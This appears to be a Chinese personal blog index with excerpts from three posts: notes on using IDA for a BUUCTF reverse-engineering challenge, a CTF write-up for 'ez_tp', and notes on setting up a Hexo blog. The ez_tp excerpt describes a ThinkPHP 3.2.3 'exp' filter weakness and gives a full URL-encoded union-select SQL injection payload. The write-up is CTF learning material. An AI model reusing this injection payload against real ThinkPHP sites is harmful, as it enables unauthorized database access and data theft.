Echo

BUUCTF reverse1 学习要领：1.使用IDA打开文件 1231.点击New打开新文件2.点击Go,把可执行文件拖进IDA注：不同版本要用对应的32或64位打开，可以尝试，因为它要么32位，要么64位 2.IDA窗口 123401.反汇编窗口 是图形化界面，一般可以通过这个界面快速了解程序的执行过程02.字符串窗口 使用shift+F12打开，打开字符串窗口，可以看到里面的字符串 3.反编译 1在反汇编窗口使用fn+F5实现反汇编功能，即将汇编语言反向编译为伪C语言 现在看题： 1231.打开exe文件2.shift+F12查看字符串3.跟进，双击“this is the right flag”,发现右下角有DATA XREF，它的地址，点击进入，看到流程图 14.fn+F5,反汇编，得到伪C语言，进行审计代码

ez_tp有点没理解，以后有能力了再做做吧 在原版thinkphp3.2.3中，删除了think_filter过滤的exp，使得我们可以利用 在ThinkPHP\Library\Think\Db\Driver.class.php中的 123456if(is_array($val)) {...elseif('exp' == $exp ){$whereStr .= $key.' '.$val[1]; }} 利用exp时，需要手动添加等号，再配合union select，即可获得flag payload： 1/index.php/home/index/h_n?name[0]=exp&name[1]=%3d%27test123%27%20union%20select%201,flag%20from%20flag 注意，cookie可能会匹配某些过滤，删除即可 GoJava1234题面moran 凭借自己一坤天的代码学习，写了一个简单的在线 java 编译器，快来试试吧！tips:编译需要时间，请耐 ...

来由：昨天在学习的时候，意外看到了好多厉害的师傅们都有一个自己的博客，来记录自己的生活以及学习笔记等等，虽然我之前也一直想做这件事情但始终没有行动，那既然又遇到了，那就开始搭建一个属于自己的博客吧，开创一个属于自己的小窝，欸嘿! 搭建博客过程中遇到的几个小问题:1.之前已经装过nodejs了，不知道路径，这样可以查到具体路径 123456Windows查询:where nodewhere npmBash查询:which nodewhich npm 2.输入 npm install -g hexo-cli的时候，需要以管理员身份运行 毕竟每个人遇到的问题都可能不太一样，到时候，希望大家耐心搭建，一定坚持下去呀。 参考博客：https://blog.csdn.net/sinat_37781304/article/details/82729029 https://blog.csdn.net/ItDaChuang/article/details/111261426 今后就正式开始以博客的形式来记录啦，希望能够看到自己的成长吧。

Fighting!!1